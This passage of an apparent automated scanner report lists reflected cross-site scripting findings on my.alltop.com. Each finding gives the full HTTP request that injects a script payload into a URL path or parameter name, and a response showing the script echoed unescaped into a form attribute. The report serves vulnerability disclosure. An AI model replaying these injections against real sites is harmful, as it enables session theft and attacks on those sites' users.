Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000BF)%3C/script%3Efa79a"><script>alert(1)</script>cbd44e0cb8a" method="post" accept-charset="utf-8">
...[SNIP]...

1.11. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e3de"><script>alert(1)</script>9890588f225 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/'%22--%3E%3C5e3de"><script>alert(1)</script>9890588f225/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/'%22--%3E%3C5e3de"><script>alert(1)</script>9890588f225/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.12. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b138e"><script>alert(1)</script>302606c0f47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/'%22--%3E%3C/style%3E%3Cb138e"><script>alert(1)</script>302606c0f47/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:01 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:01 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/'%22--%3E%3C/style%3E%3Cb138e"><script>alert(1)</script>302606c0f47/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.13. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb335"><script>alert(1)</script>26cb49a1f48 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3Cbb335"><script>alert(1)</script>26cb49a1f48/script%3E HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3Cbb335"><script>alert(1)</script>26cb49a1f48/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.14. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 399d9"><script>alert(1)</script>f107f099ee0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E399d9"><script>alert(1)</script>f107f099ee0 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E399d9"><script>alert(1)</script>f107f099ee0" method="post" accept-charset="utf-8">
...[SNIP]...

1.15. http://my.alltop.com/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a0a3"><script>alert(1)</script>aa3f3fd8855 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E?7a0a3"><script>alert(1)</script>aa3f3fd8855=1 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000131)%3C/script%3E?7a0a3"><script>alert(1)</script>aa3f3fd8855=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.16. http://my.alltop.com/alpha//%22ns=%22netsparker(0x00013A) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha//%22ns=%22netsparker(0x00013A)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 207fa"><script>alert(1)</script>b634162474e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha//%22ns207fa"><script>alert(1)</script>b634162474e=%22netsparker(0x00013A) HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:02 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:02 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha//%22ns207fa"><script>alert(1)</script>b634162474e=%22netsparker(0x00013A)" method="post" accept-charset="utf-8">
...[SNIP]...

1.17. http://my.alltop.com/alpha//%22ns=%22netsparker(0x00013A) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha//%22ns=%22netsparker(0x00013A)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7210"><script>alert(1)</script>b3c26a3383e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha//%22ns=%22netsparker(0x00013A)?d7210"><script>alert(1)</script>b3c26a3383e=1 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:56 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:56 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:56 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha//%22ns=%22netsparker(0x00013A)?d7210"><script>alert(1)</script>b3c26a3383e=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.18. http://my.alltop.com/alpha//%2522ns%253D%2522netsparker%25280x00013E%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66da4"><script>alert(1)</script>b6fc588523a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha//%2522ns%253D%2522netsparker%25280x00013E%2529)66da4"><script>alert(1)</script>b6fc588523a HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
